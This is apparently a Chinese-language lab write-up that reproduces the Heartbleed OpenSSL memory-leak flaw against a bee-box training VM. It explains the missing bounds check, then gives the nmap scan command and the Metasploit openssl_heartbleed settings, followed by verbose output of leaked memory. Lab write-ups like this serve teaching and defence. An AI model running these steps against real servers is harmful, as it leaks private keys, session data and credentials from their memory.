漏洞成因
由于memcpy()调用受害者输入内容作为长度参数时没有提前进行边界检查,攻击者可以追踪openssl分配的64kb的缓存空间,将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露
复现过程
准备工作
kali:192.168.239.131
bee-box:192.168.239.138
开始复现
kali ping bee-box查看连通性
随后nmap -O查看8443是否开放
随后使用nmap的ssl-heartbleed.nse扫描查看是否存在漏洞
nmap -sV -p 8443 --script ssl-heartbleed.nse 192.168.239.138
存在漏洞,随后使用msf进行攻击
root@192:~# msfconsole
±------------------------------------------------------+
| METASPLOIT by Rapid7 |
±--------------------------±--------------------------+
| __________________ | |
| c((o((() | |""""""""""""|====[*** |
| )=\ | | EXPLOIT \ |
| // \ | |_____ |
| // \ | |[msf >]====\ |
| // \ | |______________________\ |
| // RECON \ | (@)(@)(@)(@)(@)(@)(@)/ |
| // \ | ********************* |
±--------------------------±--------------------------+
| o O o | ‘///’/ |
| o O | )( |
| o | .’ LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / ||_ \ |
| | PAYLOAD |""_, | / (|| \ |
| |________________||)__| | | __||_) | |
| |(@)(@)"""|(@)(@)|(@) | " || " |
| = = = = = = = = = = = = | ‘--------------’ |
±--------------------------±--------------------------+
=[ metasploit v6.0.17-dev ]
- – --=[ 2076 exploits - 1124 auxiliary - 352 post ]
- – --=[ 592 payloads - 45 encoders - 10 nops ]
- – --=[ 7 evasion ]
Metasploit tip: Metasploit can be configured at startup, see msfconsole --help to learn more
msf6 > search heartbleed
Matching Modules
Name Disclosure Date Rank Check Description
0 auxiliary/scanner/ssl/openssl_heartbleed 2014-04-07 normal Yes OpenSSL Heartbeat (Heartbleed) Information Leak
1 auxiliary/server/openssl_heartbeat_client_memory 2014-04-07 normal No OpenSSL Heartbeat (Heartbleed) Client Memory Exposure
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/server/openssl_heartbeat_client_memory
msf6 > use auxiliary/scanner/ssl/openssl_heartbleed
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > show options
Module options (auxiliary/scanner/ssl/openssl_heartbleed):
Name Current Setting Required Description
DUMPFILTER no Pattern to filter leaked memory before storing
LEAK_COUNT 1 yes Number of times to leak memory per SCAN or DUMP invocation
MAX_KEYTRIES 50 yes Max tries to dump key
RESPONSE_TIMEOUT 10 yes Number of seconds to wait for a server response
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:
RPORT 443 yes The target port (TCP)
STATUS_EVERY 5 yes How many retries until key dump status
THREADS 1 yes The number of concurrent threads (max one per host)
TLS_CALLBACK None yes Protocol to use, “None” to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
TLS_VERSION 1.0 yes TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)
Auxiliary action:
Name Description
SCAN Check hosts for vulnerability
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set rhost 192.168.239.138
rhost => 192.168.239.138
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set rport 8443
rport => 8443
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true
verbose => true
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > run
[] 192.168.239.138:8443 - Leaking heartbeat response #1
[] 192.168.239.138:8443 - Sending Client Hello…
[] 192.168.239.138:8443 - SSL record #1:
[] 192.168.239.138:8443 - Type: 22
[] 192.168.239.138:8443 - Version: 0x0301
[] 192.168.239.138:8443 - Length: 86
[] 192.168.239.138:8443 - Handshake #1:
[] 192.168.239.138:8443 - Length: 82
[] 192.168.239.138:8443 - Type: Server Hello (2)
[] 192.168.239.138:8443 - Server Hello Version: 0x0301
[] 192.168.239.138:8443 - Server Hello random data: 62202699b1eeba384c601bfa314e64ac091a7553f2a15a7aa567f552654ca23e
[] 192.168.239.138:8443 - Server Hello Session ID length: 32
[] 192.168.239.138:8443 - Server Hello Session ID: 96ae86840850e9cb77ceabcf847ce4309d3abd9e2cf53e50c1b0a9845e524383
[] 192.168.239.138:8443 - SSL record #2:
[] 192.168.239.138:8443 - Type: 22
[] 192.168.239.138:8443 - Version: 0x0301
[] 192.168.239.138:8443 - Length: 675
[] 192.168.239.138:8443 - Handshake #1:
[] 192.168.239.138:8443 - Length: 671
[] 192.168.239.138:8443 - Type: Certificate Data (11)
[] 192.168.239.138:8443 - Certificates length: 668
[] 192.168.239.138:8443 - Data length: 671
[] 192.168.239.138:8443 - Certificate #1:
[] 192.168.239.138:8443 - Certificate #1: Length: 665
[] 192.168.239.138:8443 - Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name emailAddress=bwapp@itsecgames.com,CN=bee-box.bwapp.local,OU=IT,O=MME,L=Menen,ST=Flanders,C=BE>, issuer=#<OpenSSL::X509::Name emailAddress=bwapp@itsecgames.com,CN=bee-box.bwapp.local,OU=IT,O=MME,L=Menen,ST=Flanders,C=BE>, serial=#OpenSSL::BN:0x00005582db39cb88, not_before=2013-04-14 18:11:32 UTC, not_after=2018-04-13 18:11:32 UTC>
[] 192.168.239.138:8443 - SSL record #3:
[] 192.168.239.138:8443 - Type: 22
[] 192.168.239.138:8443 - Version: 0x0301
[] 192.168.239.138:8443 - Length: 203
[] 192.168.239.138:8443 - Handshake #1:
[] 192.168.239.138:8443 - Length: 199
[] 192.168.239.138:8443 - Type: Server Key Exchange (12)
[] 192.168.239.138:8443 - SSL record #4:
[] 192.168.239.138:8443 - Type: 22
[] 192.168.239.138:8443 - Version: 0x0301
[] 192.168.239.138:8443 - Length: 4
[] 192.168.239.138:8443 - Handshake #1:
[] 192.168.239.138:8443 - Length: 0
[] 192.168.239.138:8443 - Type: Server Hello Done (14)
[] 192.168.239.138:8443 - Sending Heartbeat…
[] 192.168.239.138:8443 - Heartbeat response, 13027 bytes
[+] 192.168.239.138:8443 - Heartbeat response with leak, 13027 bytes
[] 192.168.239.138:8443 - Printable info leaked:
…b…[…K~#.Mu…@…%....f.....".!.9.8.........5.............................3.2.....E.D...../...A.........................................c.v...........R.z.....3.J...0...h.6.E.a.......&...4. ...g..b…d…|…k.s…2…>…w.Y.A…e.7…F…w.[…K…i.O…P…=.d…P…j…;…p…U…0.}.B.’…e.;…’.#.T…F.&…x…-…Z…~.G…X…<…@…D… …Q…~…{.y…^.t.s.I.,.q.n…o.m.l.k.j.V.i…
.
g
.
f
.
.
.
.
.
.g.f.....
.g.f.....…a.u.y…Z…C.Y./.?.X…9.W…V.T….<…Q.O.+…%.J.2…E…D.C.A…@.=.H…4.R.M.#.5…:.6.h…5.m…/…-.%…)…L.".!..N…:…l…r…(…x…f…S…]…t.1…c.b.S.>.9.7.3… repeated 11974 times …
[] 192.168.239.138:8443 - Scanned 1 of 1 hosts (100% complete)
3623
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
